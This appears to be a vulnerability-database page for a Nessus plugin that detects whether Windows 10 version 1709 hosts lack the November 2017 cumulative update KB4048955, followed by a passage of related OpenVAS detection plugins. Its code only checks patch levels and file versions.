KB4048955: Windows 10 Version 1709 and Windows Server Version 1709 November 2017 Cumulative Update
2017-11-14T00:00:00
ID: SMB_NT_MS17_NOV_4048955.NASL
Type: nessus
Reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2017-11-14T00:00:00
Description
The remote Windows host is missing security update 4048955.
It is, therefore, affected by multiple vulnerabilities:

- A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11827, CVE-2017-11858)

- A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843, CVE-2017-11846)

- An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11803, CVE-2017-11844)

- A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11855, CVE-2017-11856, CVE-2017-11869)

- An information disclosure vulnerability exists when Windows Media Player improperly discloses file information. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk. (CVE-2017-11768)

- An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Internet Explorer. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11834)

- A security feature bypass vulnerability exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content. (CVE-2017-11863)

- An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. (CVE-2017-11880)

- A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11851)

- A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11836, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11861, CVE-2017-11862, CVE-2017-11866, CVE-2017-11870, CVE-2017-11871, CVE-2017-11873)

- An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11791)

- A security feature bypass vulnerability exists in Microsoft Edge as a result of how memory is accessed in code compiled by the Edge Just-In-Time (JIT) compiler that allows Control Flow Guard (CFG) to be bypassed. By itself, this CFG bypass vulnerability does not allow arbitrary code execution. However, an attacker could use the CFG bypass vulnerability in conjunction with another vulnerability, such as a remote code execution vulnerability, to run arbitrary code on a target system. (CVE-2017-11874)

- A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non-malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11830)

- An information disclosure vulnerability exists when Internet Explorer improperly handles page content, which could allow an attacker to detect the navigation of the user leaving a maliciously crafted page. (CVE-2017-11848)

- An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-11831, CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)

- An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11850)

- An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests. An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2017-11833)

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the Microsoft Security Updates API. The text
# itself is copyright (C) Microsoft Corporation.
#
include("compat.inc");

if (description)
{
  script_id(104551);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/18");

  script_cve_id(
    "CVE-2017-11768",
    "CVE-2017-11791",
    "CVE-2017-11803",
    "CVE-2017-11827",
    "CVE-2017-11830",
    "CVE-2017-11831",
    "CVE-2017-11833",
    "CVE-2017-11834",
    "CVE-2017-11836",
    "CVE-2017-11837",
    "CVE-2017-11838",
    "CVE-2017-11839",
    "CVE-2017-11840",
    "CVE-2017-11841",
    "CVE-2017-11842",
    "CVE-2017-11843",
    "CVE-2017-11844",
    "CVE-2017-11846",
    "CVE-2017-11848",
    "CVE-2017-11849",
    "CVE-2017-11850",
    "CVE-2017-11851",
    "CVE-2017-11853",
    "CVE-2017-11855",
    "CVE-2017-11856",
    "CVE-2017-11858",
    "CVE-2017-11861",
    "CVE-2017-11862",
    "CVE-2017-11863",
    "CVE-2017-11866",
    "CVE-2017-11869",
    "CVE-2017-11870",
    "CVE-2017-11871",
    "CVE-2017-11873",
    "CVE-2017-11874",
    "CVE-2017-11880"
  );
  script_bugtraq_id(
    101703,
    101704,
    101705,
    101706,
    101707,
    101709,
    101714,
    101715,
    101716,
    101719,
    101721,
    101722,
    101723,
    101724,
    101725,
    101727,
    101728,
    101730,
    101731,
    101732,
    101733,
    101734,
    101735,
    101737,
    101738,
    101740,
    101741,
    101742,
    101748,
    101750,
    101751,
    101753,
    101755,
    101762,
    101763,
    101764
  );
  script_xref(name:"MSKB", value:"4048955");
  script_xref(name:"MSFT", value:"MS17-4048955");

  script_name(english:"KB4048955: Windows 10 Version 1709 and Windows Server Version 1709 November 2017 Cumulative Update");
  script_summary(english:"Checks for rollup.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Windows host is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote Windows host is missing security update 4048955.
It is, therefore, affected by multiple vulnerabilities :
- A remote code execution vulnerability exists in the way
that Microsoft browsers access objects in memory. The
vulnerability could corrupt memory in a way that could
allow an attacker to execute arbitrary code in the
context of the current user. An attacker who
successfully exploited the vulnerability could gain the
same user rights as the current user. (CVE-2017-11827,
CVE-2017-11858)
- A remote code execution vulnerability exists in the way
the scripting engine handles objects in memory in
Microsoft browsers. The vulnerability could corrupt
memory in such a way that an attacker could execute
arbitrary code in the context of the current user. An
attacker who successfully exploited the vulnerability
could gain the same user rights as the current user.
(CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,
CVE-2017-11846)
- An information disclosure vulnerability exists when
Microsoft Edge improperly handles objects in memory. An
attacker who successfully exploited the vulnerability
could obtain information to further compromise the users
system. (CVE-2017-11803, CVE-2017-11844)
- A remote code execution vulnerability exists when
Internet Explorer improperly accesses objects in memory.
The vulnerability could corrupt memory in such a way
that an attacker could execute arbitrary code in the
context of the current user. An attacker who
successfully exploited the vulnerability could gain the
same user rights as the current user. (CVE-2017-11855,
CVE-2017-11856, CVE-2017-11869)
- An information vulnerability exists when Windows Media
Player improperly discloses file information. Successful
exploitation of the vulnerability could allow the
attacker to test for the presence of files on disk.
(CVE-2017-11768)
- An information disclosure vulnerability exists when the
scripting engine does not properly handle objects in
memory in Internet Explorer. An attacker who
successfully exploited the vulnerability could obtain
information to further compromise the users system.
(CVE-2017-11834)
- A security feature bypass vulnerability exists in
Microsoft Edge when the Edge Content Security Policy
(CSP) fails to properly validate certain specially
crafted documents. An attacker who exploited the bypass
could trick a user into loading a page containing
malicious content. (CVE-2017-11863)
- An information disclosure vulnerability exists when the
Windows kernel improperly initializes objects in memory.
(CVE-2017-11880)
- A Win32k information disclosure vulnerability exists
when the Windows GDI component improperly discloses
kernel memory addresses. An attacker who successfully
exploited the vulnerability could obtain information to
further compromise the users system. (CVE-2017-11851)
- A remote code execution vulnerability exists in the way
that the scripting engine handles objects in memory in
Microsoft Edge. The vulnerability could corrupt memory
in such a way that an attacker could execute arbitrary
code in the context of the current user. An attacker who
successfully exploited the vulnerability could gain the
same user rights as the current user. (CVE-2017-11836,
CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,
CVE-2017-11861, CVE-2017-11862, CVE-2017-11866,
CVE-2017-11870, CVE-2017-11871, CVE-2017-11873)
- An information disclosure vulnerability exists when the
scripting engine does not properly handle objects in
memory in Microsoft browsers. An attacker who
successfully exploited the vulnerability could obtain
information to further compromise the users system.
(CVE-2017-11791)
- A security feature bypass vulnerability exists in
Microsoft Edge as a result of how memory is accessed in
code compiled by the Edge Just-In-Time (JIT) compiler
that allows Control Flow Guard (CFG) to be bypassed. By
itself, this CFG bypass vulnerability does not allow
arbitrary code execution. However, an attacker could use
the CFG bypass vulnerability in conjunction with another
vulnerability, such as a remote code execution
vulnerability, to run arbitrary code on a target system.
(CVE-2017-11874)
- A security feature bypass exists when Device Guard
incorrectly validates an untrusted file. An attacker who
successfully exploited this vulnerability could make an
unsigned file appear to be signed. Because Device Guard
relies on the signature to determine the file is non-
malicious, Device Guard could then allow a malicious
file to execute. In an attack scenario, an attacker
could make an untrusted file appear to be a trusted
file. The update addresses the vulnerability by
correcting how Device Guard handles untrusted files.
(CVE-2017-11830)
- An information disclosure vulnerability exists when
Internet Explorer improperly handles page content, which
could allow an attacker to detect the navigation of the
user leaving a maliciously crafted page.
(CVE-2017-11848)
- An information disclosure vulnerability exists when the
Windows kernel fails to properly initialize a memory
address. An attacker who successfully exploited this
vulnerability could obtain information to further
compromise the users system. (CVE-2017-11831,
CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)
- An information disclosure vulnerability exists when the
Microsoft Windows Graphics Component improperly handles
objects in memory. An attacker who successfully
exploited the vulnerability could obtain information to
further compromise the users system. (CVE-2017-11850)
- An information disclosure vulnerability exists in the
way that Microsoft Edge handles cross-origin requests.
An attacker who successfully exploited this
vulnerability could determine the origin of all webpages
in the affected browser. (CVE-2017-11833)");
  # https://support.microsoft.com/en-us/help/4048955/windows-10-update-kb4048955
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?948aaf0e");
  script_set_attribute(attribute:"solution", value:
"Apply security update KB4048955.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-11827");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/11/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/11/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:edge");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows : Microsoft Bulletins");

  script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_check_rollup.nasl", "smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, "Host/patch_management_checks");

  exit(0);
}

include("audit.inc");
include("smb_hotfixes_fcheck.inc");
include("smb_hotfixes.inc");
include("smb_func.inc");
include("misc_func.inc");

# Exit unless Microsoft bulletin checks are possible on this host.
get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = "MS17-11";
kbs = make_list('4048955');

# Use patch-management data for the check when it is available.
if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

# Exit unless the host is Windows 10 (service pack level 0).
if (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);

# The system drive share must be reachable for the rollup check.
share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

# Check OS build 16299 for the November 2017 rollup (KB4048955);
# a true result means the rollup is missing and the host is reported.
if (
  smb_check_rollup(os:"10",
                   sp:0,
                   os_build:"16299",
                   rollup_date:"11_2017",
                   bulletin:bulletin,
                   rollup_kb_list:[4048955])
)
{
  replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
  hotfix_security_hole();
  hotfix_check_fversion_end();
  exit(0);
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
}
{"openvas": [{"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11862", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11874", "CVE-2017-11846", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048955", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812088", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048955)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048955)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812088\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11843\",\n \"CVE-2017-11873\", \"CVE-2017-11874\", \"CVE-2017-11791\", \"CVE-2017-11803\",\n \"CVE-2017-11827\", \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\",\n \"CVE-2017-11837\", \"CVE-2017-11838\", \"CVE-2017-11844\", \"CVE-2017-11846\",\n \"CVE-2017-11848\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11861\", \"CVE-2017-11862\", \"CVE-2017-11863\", \"CVE-2017-11866\",\n \"CVE-2017-11869\", \"CVE-2017-11870\", \"CVE-2017-11871\");\n script_bugtraq_id(101735, 101734, 101740, 101728, 101750, 101715, 101704, 101703,\n 101706, 101725, 101727, 101722, 101737, 101707, 101741, 101709,\n 101751, 101753, 101716, 101723, 101748, 101732, 101742, 101731,\n 101730);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:12:00 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048955)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048955\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when Internet 
Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in Microsoft Edge as a result of how memory is accessed in code\n compiled by the Edge Just-In-Time (JIT) compiler that allows Control Flow Guard\n (CFG) to be bypassed.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when Microsoft Edge improperly handles objects in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Microsoft browsers.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the current user, determine the origin of all\n webpages in the affected browser, gain access to potentially sensitive\n information, bypass certain security features and trick a user into loading a\n page containing malicious content.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048955\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nPath = smb_get_system32root();\nif(!Path ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:Path, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.63\"))\n{\n report = report_fixed_ver( file_checked:Path + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.63\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical 
security\n update according to Microsoft KB4048952", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812136", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812136", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048952)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048952)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812136\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\", \"CVE-2017-11873\",\n \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\", \"CVE-2017-11791\",\n \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\",\n \"CVE-2017-11842\", \"CVE-2017-11843\", \"CVE-2017-11846\", \"CVE-2017-11847\",\n \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\",\n \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11830\", \"CVE-2017-11831\", \"CVE-2017-11833\");\n script_bugtraq_id(101748, 101732, 101742, 101728, 101705, 101711, 101755, 101715, 101703,\n 101725, 101727, 101722, 101737, 101735, 101734, 101719, 101740, 101741,\n 101729, 101709, 101762, 101738, 101763, 101764, 101751, 101753, 101716,\n 101714, 101721, 101706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:08:33 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048952)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048952\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the 
target host.\");\n\n script_tag(name:\"insight\", value:\"This update includes critical security updates\n\n - Addressed issue with the rendering of a graphics element in Internet Explorer.\n\n - Addressed issue where access to the Trusted Platform Module (TPM) for\n administrative operations wasn't restricted to administrative users.\n\n - Addressed issue where applications based on the Microsoft JET Database Engine\n fail when creating or opening Microsoft Excel .xls files.\n\n - Addressed a crash in Internet Explorer that was seen in machines that used large\n font-size settings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the current user, and obtain information to further\n compromise the user's system. Also attacker can run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048952\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1231\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10586.0 - 11.0.10586.1231\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", 
"CVE-2017-11874", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048954", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812089", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048954)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048954)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812089\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11873\", \"CVE-2017-11874\",\n \"CVE-2017-11880\", \"CVE-2017-11788\", \"CVE-2017-11791\", \"CVE-2017-11803\",\n \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\", \"CVE-2017-11833\",\n \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\", \"CVE-2017-11838\",\n \"CVE-2017-11844\", \"CVE-2017-11845\", \"CVE-2017-11846\", \"CVE-2017-11847\",\n \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\",\n \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11861\", \"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\",\n \"CVE-2017-11870\", \"CVE-2017-11871\", \"CVE-2017-11872\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101728, 101750, 101755,\n 101711, 101715, 101704, 101703, 101714, 101721, 101706, 101725,\n 101727, 101722, 101737, 101707, 101708, 101741, 101729, 101709,\n 101762, 101738, 101763, 101764, 101751, 101753, 101716, 101723,\n 101748, 101732, 101742, 101731, 101730, 101749);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:37:02 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities 
